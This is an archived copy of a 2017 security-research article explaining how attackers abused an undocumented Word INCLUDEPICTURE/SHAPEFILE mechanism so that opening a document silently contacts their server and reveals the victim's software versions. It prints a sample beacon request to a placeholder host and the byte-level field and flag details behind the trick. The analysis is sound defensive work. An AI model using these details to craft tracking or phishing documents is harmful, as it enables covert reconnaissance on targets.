{
	"id": "b9b4c550-6131-4c10-9b76-1e8e34056c86",
	"created_at": "2026-04-06T00:15:34.573811Z",
	"updated_at": "2026-04-10T03:20:33.735606Z",
	"deleted_at": null,
	"sha1_hash": "260b952d46bdfbd3ab3f2cbac54f74e075f40598",
	"title": "An (un)documented Word feature abused by attackers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 114291,
	"plain_text": "An (un)documented Word feature abused by attackers\r\nBy Alexander Liskin\r\nPublished: 2017-09-18 · Archived: 2026-04-05 18:21:39 UTC\r\nA little while back we were investigating the malicious activities of the Freakyshelly targeted attack and came\r\nacross spear phishing emails that had some interesting documents attached to them. They were in OLE2 format\r\nand contained no macros, exploits or any other active content. However, a close inspection revealed that they\r\ncontained several links to PHP scripts located on third-party web resources. When we attempted to open these\r\nfiles in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers\r\nreceived information about the software installed on the computer.\r\nWhat did the bad guys want with that information? Well, to ensure a targeted attack is successful, intelligence first\r\nneeds to be gathered, i.e. the bad guys need to find ways to reach prospective victims and collect information\r\nabout them. In particular, they need to know the operating system version and the version of some applications on\r\nthe victim computer, so they can send it the appropriate exploit.\r\nIn this specific case, the document looked like this:\r\nThere’s nothing suspicious about it at first glance – just a few tips about how to use Google search more\r\neffectively. The document contains no active content, no VBA macros, embedded Flash objects or PE files.\r\nHowever, when the user opens the document, Word sends the following GET request to one of the internal links.\r\nSo we opened the original document used in the attack, replaced the suspicious links with http://evil-*, and\r\nobtained the following:\r\nGET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1\r\nAccept: */*\r\nhttps://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nPage 1 of 5\n\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727;\r\n.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)\r\nAccept-Encoding: gzip, deflate\r\nHost: evil-333.com\r\nProxy-Connection: Keep-Alive\r\nThis code effectively sent information about the software installed on the victim machine to the attackers,\r\nincluding info about which version of Microsoft Office was installed. We decided to examine why Office followed\r\nthat link, and how these links can be identified in documents.\r\nInside a Word document\r\nThe first thing about the document that caught our eye was the INCLUDEPICTURE field containing one of the\r\nsuspicious links. However, as can be seen, that is not the link that Word addresses.\r\nAs a matter of fact, the data chunk seen in the fragment above contains the first and only piece of text in this\r\ndocument. The text in Word documents resides in the WordDocument stream in a ‘raw state’, i.e. it contains no\r\nformatting except so-called fields. The fields tell Word that a certain segment of the text must be presented in a\r\nspecific way; for example, it is thanks to these fields that we can see active links to other pages of the document,\r\nURL links, etc. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text.\r\nThe 0x13 byte (marked in red) in front of this field indicates that the ‘raw’ text ends there and a field description\r\nbegins. The description format is roughly as follows (according to [MS-DOC]: Word (.doc) Binary File Format):\r\nBegin = 0x13\r\nSep = 0x14\r\nEnd = 0x15\r\nField = \u003cBegin\u003e *\u003cField\u003e [Sep] *\u003cField\u003e \u003cEnd\u003e\r\nThe separator byte 0x14 is marked in yellow, and the field end byte 0x15 is shown inside the pink box.\r\nThe link to the image in the INCLUDEPICTURE field should be in ASCII format, but in this case it is in Unicode,\r\nso Word ignores the link. However, the separator byte 0x14 is followed by the byte 0x01 (shown in the green box)\r\nhttps://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nPage 2 of 5\n\nwhich indicates to the word processor that an image should be inserted at this point. The question is: how do we\r\nfind this image?\r\nThe characters and groups of characters within the text also possess properties; just like fields, these properties are\r\nresponsible for formatting (for example, they specify that a certain piece of text must be rendered in italics). The\r\nproperties of characters are stored in a two-level table within document streams under the names ‘xTable’ and\r\n‘Data’. We will not go into the complex details of how to analyze character properties, but as a result of this\r\nanalysis we can find the character properties from the offset 0x929 to 0x92C in the WordDocument stream:\r\nThis is the byte sequence with the picture placeholder 0x14 0x01 0x15. In the actual document, these bytes are\r\nlocated at offsets 0xB29 – 0xB2C, but the WordDocument stream begins with offset 0x200, and the character\r\noffsets are specified relative to its beginning.\r\nThe properties of the group of characters CP[2] indicate that an image is attached to them that is located in the\r\nData stream at offset 0:\r\n1FEF: prop[0]: 6A03 CPicLocation\r\n1FF1: value[0]: 00000000 ; character = 14\r\nWe arrive at this conclusion based on the fact that byte 0x01 is indicated in the INCLUDEPICTURE field’s value\r\n– this means the image should be located in the Data stream at the appropriate offset. If this value were different,\r\nthen it would have been necessary to look for the image in a different place or ignore this property.\r\nThis is where we stumbled on an undocumented feature. Microsoft Office documentation provides basically no\r\ndescription of the INCLUDEPICTURE field. This is all there is:\r\n0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section 2.16.5.33.\r\nStandard ECMA-376 describes only that part of INCLUDEPICTURE that precedes the separator byte. It has no\r\ndescription of what the data that follows it may mean, and how it should be interpreted. This was the main\r\nproblem in understanding what was actually happening.\r\nSo, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:\r\nForms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This\r\nform has a name and, in this case, it is another suspicious link:\r\nhttps://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nPage 3 of 5\n\nHowever, this is just an object name, so this link is not used in any way. While investigating this form further, let’s\r\nlook at the flags field (in the red box):\r\nThe value 0x0000000E resolves into a combination of three flags:\r\nmsoblipflagURL 0x00000002\r\nmsoblipflagDoNotSave 0x00000004\r\nmsoblipflagLinkToFile 0x00000008\r\nThis indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot),\r\nand that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag,\r\nwhich prevents this content from being saved to the actual document when it is opened.\r\nIf we look at what this URL is, we see that it’s the actual link that Word follows when the document is opened:\r\nWe should note that besides Word for Windows, this ‘feature’ is also present in Microsoft Office for iOS and in\r\nMicrosoft Office for Android; LibreOffice and OpenOffice do not have it. If this document is opened in\r\nLibreOffice or OpenOffice, the malicious link is not called.\r\nThis is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted\r\nattacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry\r\nout targeted attacks.\r\nKaspersky Lab’s security products are able to detect when the technique described in this article is used in\r\nMicrosoft Word documents, and to find links embedded in a document using the same technique.\r\nhttps://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nPage 4 of 5\n\nSource: https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nhttps://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899"
	],
	"report_names": [
		"81899"
	],
	"threat_actors": [],
	"ts_created_at": 1775434534,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/260b952d46bdfbd3ab3f2cbac54f74e075f40598.pdf",
		"text": "https://archive.orkl.eu/260b952d46bdfbd3ab3f2cbac54f74e075f40598.txt",
		"img": "https://archive.orkl.eu/260b952d46bdfbd3ab3f2cbac54f74e075f40598.jpg"
	}
}